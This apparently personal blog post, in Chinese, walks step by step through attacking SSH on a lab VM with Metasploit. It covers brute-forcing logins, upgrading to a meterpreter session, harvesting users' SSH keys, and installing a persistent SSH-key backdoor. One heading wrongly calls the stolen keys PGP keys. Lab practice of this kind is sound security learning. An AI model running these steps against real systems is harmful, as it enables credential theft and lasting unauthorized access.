Jirairya

利用msf进行SSH渗透

2017-10-10

搭建靶机,利用msf进行SSH渗透

搭建环境

安装openssh

sudo apt-get install openssh-server

抓取SSH Banner

nmap:

nmap -sV 192.168.222.147

使用msf的db_nmap:

msf > db_status

msf > db_nmap -sV 192.168.222.147

使用msf的辅助模块查询版本号:

msf > use auxiliary/scanner/ssh/ssh_version 

msf auxiliary(ssh_version) > set RHOSTS 192.168.222.147
RHOSTS => 192.168.222.147


msf auxiliary(ssh_version) > exploit 

爆破

msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set RHOSTS 192.168.222.147
RHOSTS => 192.168.222.147

msf auxiliary(ssh_login) > set USERPASS_FILE /root/Desktop/di.txt
USERPASS_FILE => /root/Desktop/di.txt

msf auxiliary(ssh_login) > exploit

msf auxiliary(ssh_login) > sessions 1
[*] Starting interaction with 1...

ifconfig

执行以下命令获得meterpreter 会话:

sessions -u 2
sessions -l

窃取PGP密钥登陆ssh

收集目标机器上所有用户的.ssh目录内容,下载known_hostsauthorized_key以及其他文件:

msf post(sshkey_persistence) > use post/multi/gather/ssh_creds 
msf post(ssh_creds) > set sessions 2
sessions => 2
msf post(ssh_creds) > exploit 

创建永久后门

给指定的用户添加ssh密钥,从而可通过ssh进行远程登陆

msf post(ssh_creds) > use post/linux/manage/sshkey_persistence 
msf post(sshkey_persistence) > set sessions 2
sessions => 2
msf post(sshkey_persistence) > exploit 


Similar Posts

上一篇 WSL

下一篇 VNC攻击

Comments